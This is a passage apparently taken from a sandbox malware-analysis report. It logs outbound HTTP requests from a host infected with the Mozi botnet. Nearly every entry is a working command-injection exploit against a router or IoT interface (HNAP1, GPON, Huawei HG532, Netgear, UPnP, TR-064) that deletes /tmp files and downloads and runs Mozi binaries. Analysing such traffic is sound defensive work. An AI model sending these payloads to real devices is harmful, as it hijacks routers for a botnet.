                                                              Host: 202.152.121.18:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              6192.168.2.2341912152.158.234.1980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224807024 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              7192.168.2.2343658101.108.225.4737215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224832058 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 101.108.225.47:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              8192.168.2.2360294182.216.146.14780
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224873066 CET804OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 182.216.146.147:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              9192.168.2.2354836142.235.63.1408080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224904060 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              10192.168.2.233567276.17.188.3780
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.225878000 CET801OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 76.17.188.37:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              11192.168.2.23331626.218.88.25480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.225912094 CET801OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 6.218.88.254:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              12192.168.2.234153815.157.152.648080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.225929976 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              13192.168.2.2342464207.207.172.9637215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.225963116 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 207.207.172.96:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              14192.168.2.2342494221.40.54.22180
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.225981951 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              15192.168.2.2336258170.243.90.6437215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226016045 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 170.243.90.64:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              16192.168.2.2356236131.43.106.198443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226030111 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              17192.168.2.234627076.227.143.21549152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226057053 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 76.227.143.215:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              18192.168.2.2345140124.39.196.188080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226089001 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              19192.168.2.235168254.78.250.895555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226099014 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              20192.168.2.2359228123.175.241.12549152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.226139069 CET933OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 123.175.241.125:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
